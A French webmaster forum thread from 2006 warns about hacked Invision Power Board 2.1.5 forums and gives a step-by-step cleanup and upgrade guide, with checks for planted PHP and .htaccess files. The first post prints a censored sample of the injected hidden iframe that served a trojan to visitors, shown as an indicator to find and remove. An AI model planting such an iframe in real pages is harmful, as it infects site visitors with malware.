Webmaster Hub: Attention aux hacks Invision - Webmaster Hub

Aller au contenu

Règles du forum

Le forum "Les annonces du Hub" est réservé aux fondateurs et administrateurs du Hub et n'est utilisé que pour des annonces spécifiques relatives à la vie du Hub, telles que des modifications de serveur, les nouvelles versions de logiciels, etc.
Il n'est donc pas possible aux membres d'y entamer un nouveau sujet, mais bien de répondre à un sujet existant.
Page 1 sur 1
  • Vous ne pouvez pas commencer un sujet
  • Vous ne pouvez pas répondre à ce sujet

Attention aux hacks Invision Noter : ***** 2 note(s)

#1 L'utilisateur est hors-ligne   Dan 

  • Webmaster
  • Voir le blog
  • Voir la galerie
  • Groupe : Direction
  • Messages : 22 945
  • Inscrit(e) : 18-août 03
  • Genre:Homme
  • Localisation:St Anne, Alderney
  • Société:Webmaster Hub Ltd.

Posté 02 juin 2006 - 15:01

Bonjour à tous !

Une mésaventure arrivée à l'un des "infogérés" m'a décidé à publier ce post.
Il se reconnaîtra facilement ! :P

Depuis la sortie de IPB V2.1.5 il y a eu un nombre plus important de forums tournant cette version qui se sont fait hacker. C'est dû à certains exploits sous IPB V2.1.5. Invision a rapidement mis à disposition des patches de sécurité, fait procéder à un audit de son code et mis la version IPB V2.1.6 en téléchargement.

IPB V2.1.6 est la version la plus stable et sûre (à l'heure où j'écris ce post) du forum Invision. Il est fortement conseillé à tous de mettre leurs forums à jour pour éviter qu'ils se fassent hacker.

N.B.: La plupart de ces "trojans" sont le résultat d'un exploit dans le code IPB et non dans une mod..

Néanmoins, un certain nombre d'utilisateurs n'ont pas fait la mise à jour à cause d'une licence expirée ou par manque de temps, ce qui a valu à leur forum de se faire hacker.

Ce guide va décrire la meilleure manière de faire la mise à jour vers 2.1.6 au cas où votre forum aurait été hacké récemment.

Si votre forum a été hacké, vous trouverez dans le "board wrapper" une iFrame similaire à celle-ci:
<iframe src="http://traf<censuré>****.biz/**/ad****.php" width=1 height=1></iframe>
(l'URL a été éditée par mes soins pour des raisons évidentes de sécurité :P )

Le code ci-dessus résulte en une demande à l'utilisateur de télécharger un fichier, et ce fichier est un trojan qui infectera le PC sur lequel il est téléchargé.
Les antivirus tels que Kaspersky l'interdisent et le visiteur ne risque donc rien avec eux, mais tout le monde n'est pas correctement équipé en antivirus, malheureusement ...

Je vais donc vous expliquer comment faire la mise à niveau vers la version V2.1.6 et vous donner quelques trucs pour prévenir les attaques futures.

Etape 1

Le fait de faire simplement un "drag and drop" des fichiers de la v2.1.6 sur ceux de la v2.1.5 ne résoudra pas complètement le problème - vu que le hacker a peut-être déposé sur votre serveur d'autres fichiers qui pourraient se montrer dangereux plus tard.

Avant de poursuivre, je vous recommenderais de faire une sauvegarde des répertoires "uploads", "style_images" et du fichier "conf_global.php" avant de passer à l'étape suivante.

Pourquoi ces répertoires ?

Certains forums peuvent autoriser aux admins/modos/membres de télécharger des pièces jointes à leurs posts - ces fichiers se retrouvent dans le répertoire "upload" . De même, certains forums pratiquent une customisation des "skins" en téléchargeant des fichiers image (le logo par exemple) qui seront utilisés par le "skin". Le fichier "conf_global.php" est le fichier de configuration. Il est important car il contient quantité d'informations utiles à votre forum (emplacement des répertoires et fichiers, paramêtres etc.).

Donc, la meilleure chose à faire en place du "drag and drop" est de supprimer tous les fichiers et répertoires dans l'arborescence de votre forum.
Une fois fait, passez à l'étape suivante.

Etape 2

Elle est simple et consiste à télécharger tous les fichiers de la version 2.1.6 sur votre serveur.
Une fois ceci fait, remettez en place les répertoires "syle_images", "upload" ainsi que le fichier "conf_global.php" que vous venez de sauvegarder.
Fait ? Passons à l'étape suivante.

Etape 3

Maintenant que vous avez supprimé les anciens fichiers et transféré avec succès (nous osons l'espérer) les nouveaux fichiers de la version 2.1.6, il vous faudra faire la mise à jour de votre base de données avec les scripts fournis par Invision.
Ceci se fait tout simplement en visitant le répertoire "upgrade" de votre installation.
Par exemple : 
http://www.votredomaine.tld/forums/upgrade/index.php
Ceci lancera le script d'upgrade Invision qui vous guidera durant la procédure.
Fini ? Heureux de l'entendre, passons à l'étape suivante !

Etape 4

Si tout va bien, vous avez réussi l'étape 1 (suppression des fichiers,et sauvegarde), l'étape 2 (téléchargé tous les fichiers de la version 2.1.6 et les sauvegardes de votre forum) ainsi que l'étape 3 (lancé le script de mise à jour). Si tout s'est bien passé, il vous reste encore un point à valider, et c'est le plus simple à faire.

Allez sur votre forum, et naviguez sur le forum, les sous-forums et les sujets (le mieux est de faire ceci avec I.E parce que les navigateurs récents vous mettent à l'abri de cet exploit par iFrame). Il ne devra pas vous être demandé de télécharger un fichier, et si vous analysez la source de vos skins, vous ne devrez voir aucun code iFrame similaire à celui que j'ai mentionné plus haut passé la balise <body>.

La meilleure manière d'être sûr après avoir été hacké est de suivre scrupuleusement les instructions qui précèdent. Vous pourrez ensuite dormir sur vos deux oreilles.

Bonne chance à tous !

Pour mémoire: Il n'y a aucune faille de sécurité confirmée pour IPB V2.1.6.

Dan
La théorie, c'est quand on sait tout et que rien ne fonctionne. La pratique, c'est quand tout fonctionne et que personne ne sait pourquoi.
Si la pratique et la théorie sont réunies, rien ne fonctionne et on ne sait pas pourquoi. - Albert Einstein -
Infogérance de serveurs dédiés OVH
0

#2 L'utilisateur est hors-ligne   Dan 

  • Webmaster
  • Voir le blog
  • Voir la galerie
  • Groupe : Direction
  • Messages : 22 945
  • Inscrit(e) : 18-août 03
  • Genre:Homme
  • Localisation:St Anne, Alderney
  • Société:Webmaster Hub Ltd.

Posté 02 juin 2006 - 15:25

En cas d'exploit, voici quelques informations supplémentaires.

Les fichiers envoyés sur votre serveur peuvent avoir plusieurs formats différents. Gardez en mémoire qu'Invision n'utilise aucun cgi, ni aucun fichier .pl ou .perl. Ces fichiers sont donc suspects, sauf si vous les avez installés délibérément.

On trouve aussi des fichiers .htaccess, dans les répertoires avec permission d'écriture. Ce que ces fichiers .htaccess font est simplement rediriger le visiteur vers un de ces fichiers php malveillants. Vérifiez tous les répertoires en mode 777 et assurez-vous qu'ils ne contiennent aucun fichier .htaccess que vous n'avez pas mis vous même. Vérifiez scrupuleusement le contenu de ces fichier dans cette éventualité.

Visitez ensuite tous vos répertoires en mode 777 (tous ceux dans lesquels tout le monde peut écrire) et assurez vous qu'il n'y a aucun fichier .php dans ceux-ci.

Par exemple (aucun de ces répertoires ne doit contenir de fichier .php):

Citation

* /cache/ - pas de .php
* /cache/skin_cache/ - pas de .php
* /cache/skin_cache/cacheid_* les seuls fichiers .php sont sous la forme "skin_unepage.php"
* /cache/lang_cache/ -
* /cache/lang_cache/*/ - vérifiez les sous-répertoires, les seuls fichiers .php sont sous la forme "lang_unepage.php".

Important - pour les répertoires skin cache et lang cache, essayez de vérifier les fichiers lang_*.php files qui DOIVENT y être.
Comparez ces fichiers avec ceux de l'installation par défaut, et notez toutes les modifications dans ces fichiers téléchargés. Dans l'incertitude, téléchargez-les localement et vérifiez qu'ils ne contiennent que des déclarations de variables.
Faites la même chose pour les fichiers skin. Les fichiers skin valides ont une entête montrant qu'Invision a créé ces fichiers. Ne les éditez pas !

Citation

* /style_emoticons/ - pas de .php
* /style_emoticons/default/ - pas de .php
* /style_emoticons/*/ - vérifiez les sous-répertoires, pas de .php
* /style_avatars/*/ - vérifiez les sous-répertoires, pas de .php
* /uploads/ - le plus important à vérifier. - Il ne peut contenir aucun fichier .php. Gardez à l'esprit qu'invision renomme les fichiers lors du téléchargement.
* /style_images/*/ - pas de .php ni dans aucun des sous-répretoires.

Assurez-vous encore qu'il n'y a dans ces répertoires aucun fichier .htaccess que vous n'avez pas mis intentionnellement.

Attention: les fichiers .htaccess sont cachés par défaut sous le shell Linux. Il faut utiliser "ls -a" pour les voir.

Un autre point à vérifier en cas de hack: le fichier conf_global.pghp.
Téléchargez-le en local et regardez consciencieusement si rien ne vous semble bizarre.
Dans le doute, postez cette ligne sur le Hub !

Vérifiez aussi dans le panneau d'administration le "Board Wrapper" de toutes vos skins. Supprimez le <iframe> si vous le trouvez.

Au cas où votre fichier conf_global.php aurait été modifié. Changez le mot de passe de mysql avec Cpanel ou phpMyAdmin, et éditez le fichier conf_global.php.
Recherchez aussi dans votre base de données si vous n'avez pas de membre ayant le statut admin si vous ne les avez pas nommés vous-même.
Essayez dans ce cas de tracer l'IP du visiteur ayant accédé à admin.php, et tracez tous les fichiers vus sur le serveur par cette IP.

C'était quelques idées, pas forcément exhaustives :)
La théorie, c'est quand on sait tout et que rien ne fonctionne. La pratique, c'est quand tout fonctionne et que personne ne sait pourquoi.
Si la pratique et la théorie sont réunies, rien ne fonctionne et on ne sait pas pourquoi. - Albert Einstein -
Infogérance de serveurs dédiés OVH
0

#3 L'utilisateur est hors-ligne   Xavfun 

  • Vainqueur du concours "ornithorynque polyglotte"
  • Groupe : Membre
  • Messages : 1 305
  • Inscrit(e) : 20-avril 04
  • Genre:Homme
  • Localisation:Paris
  • Société:http://www.xavfun.com

Posté 02 juin 2006 - 17:05

Voir le messageDan, le vendredi 02 juin 2006, 16h01, dit :

Une mésaventure arrivée à l'un des "infogérés" m'a décidé à publier ce post.
Il se reconnaître facilement ! :P


:oops: oops, on parle de moi ici ? :whistling:

Hello

je profite de ce topic pour dire :

- il ne faut JAMAIS dire "je ferais la mise à jour demain"
c'était mon cas. (panne d'adsl, j'aurais du demander à quelqu'un de me la faire)

Et encore je serais tenté de dire que ce n'était pas un trop méchant Hack, car ça touchait que les visiteurs ayant Internet Explorer et pas d'anti-virus d'installé sur leur ordinateur (ce qui n'est vraiment pas sérieux non plus)

Les symptômes :

Les visiteurs qui sont passés "chez moi" ce jour là et qui n'avaient pas d'anti-virus, ont eu leur Internet Explorer Hors Services et ne peuvent plus surfer (donc impossible de prévenir le responsable du forum ou de lui crier dessus)

Conclusion

Je suis content d'avoir souscrit à l'infogérance du Hub, et au système de Backup :clap:
car sinon c'était pas gagné pour trouver la ligne de code
Annuaire FuN avec liens en dur....
Découvrez la face cachée de vos Consoles de Jeux

news consoles de jeux
0

#4 L'utilisateur est hors-ligne   thierry8 

  • Groupe : Membre
  • Messages : 16
  • Inscrit(e) : 24-mars 06

Posté 02 juin 2006 - 20:04

Merci de cette information très utile.
:thumbsup:
0

Partager ce sujet :


Page 1 sur 1
  • Vous ne pouvez pas commencer un sujet
  • Vous ne pouvez pas répondre à ce sujet

1 utilisateur(s) en train de lire ce sujet
0 membre(s), 1 invité(s), 0 utilisateur(s) anonyme(s)